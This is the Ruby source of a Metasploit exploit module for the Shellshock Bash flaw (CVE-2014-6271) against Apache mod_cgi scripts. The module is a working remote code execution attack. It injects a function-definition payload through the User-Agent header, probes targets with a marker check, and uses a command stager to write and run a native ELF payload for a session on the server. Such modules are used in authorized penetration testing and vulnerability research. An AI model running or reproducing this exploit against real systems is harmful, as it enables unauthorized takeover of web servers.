Apache mod_cgi Bash Environment Variable Code Injection

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',  
'Description' => %q{  
This module exploits a code injection in specially crafted environment  
variables in Bash, specifically targeting Apache mod_cgi scripts through  
the HTTP_USER_AGENT variable.  
},  
'Author' => [  
'Stephane Chazelas', # Vulnerability discovery  
'wvu', # Original Metasploit aux module  
'juan vazquez' # Allow wvu's module to get native sessions  
],  
'References' => [  
['CVE', '2014-6271'],  
['URL', 'https://access.redhat.com/articles/1200223'],  
['URL', 'http://seclists.org/oss-sec/2014/q3/649']  
],  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 2048  
},  
'Targets' =>  
[  
[ 'Linux x86',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86,  
'CmdStagerFlavor' => [ :echo, :printf ]  
}  
],  
[ 'Linux x86_64',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86_64,  
'CmdStagerFlavor' => [ :echo, :printf ]  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Sep 24 2014',  
'License' => MSF_LICENSE  
))  
  
register_options([  
OptString.new('TARGETURI', [true, 'Path to CGI script']),  
OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),  
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),  
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),  
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])  
], self.class)  
end  
  
def check  
res = req("echo #{marker}")  
  
if res && res.body.include?(marker * 3)  
Exploit::CheckCode::Vulnerable  
else  
Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
# Cannot use generic/shell_reverse_tcp inside an elf  
# Checking before proceeds  
if generate_payload_exe.blank?  
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")  
end  
  
execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)  
  
# A last chance after the cmdstager  
# Trying to make it generic  
unless session_created?  
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")  
end  
end  
  
def execute_command(cmd, opts)  
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")  
  
req(cmd)  
end  
  
def req(cmd)  
send_request_cgi(  
{  
'method' => datastore['METHOD'],  
'uri' => normalize_uri(target_uri.path.to_s),  
'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"  
}, datastore['TIMEOUT'])  
end  
  
def marker  
@marker ||= rand_text_alphanumeric(rand(42) + 1)  
end  
end  
`